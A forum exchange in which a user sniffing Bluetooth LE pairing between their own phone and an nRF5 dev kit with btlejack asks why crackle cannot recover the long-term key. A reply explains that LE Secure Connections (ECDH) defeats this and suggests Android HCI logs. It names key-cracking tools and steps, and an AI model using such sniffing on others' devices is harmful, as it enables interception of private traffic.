encryption information packets

[aamert7]

hello, i am establishing a connection between my phone android and nrf5 DK using nrf connect app , and trying to capture LTK , using btlejack on a single micro-bit chip, many attempts i failed to capture all the packets and the connection always lost so fast, the best was attempt when i could capture the following packets together :

• pairing request
• pairing response
• pairing public keys.
• pairing random keys.
• DHkeys checks.
• LL_ENC_REQ
• LL_ENC_RSP but nothing about encryption information that i could discover the LTK by them,
• i tried to use crack, it failed ( not able to crack due to following error: LE secure connection) any suggestions guys how to fix this issue, or if i am able to derive the LTK from the packets i captured or they are useless.

[DeveloperMarius]

Hey, the connection is encrypted with a key that is exchanged via a diffie hellman key exchange. Thus, you cannot decrypt the packets. crackle only works with LE Legacy Paring and not the mentioned LE Secure Connection Paring using ECDH.

To my knowledge, there is no way to decrypt these packets captured with btlejack. When you want to analyze the contents of packets in a LE Secure Connection I would recommend recording them using the Android Debugger: https://medium.com/@charlie.d.anderson/how-to-get-the-bluetooth-host-controller-interface-logs-from-a-modern-android-phone-d23bde00b9fa

~ Marius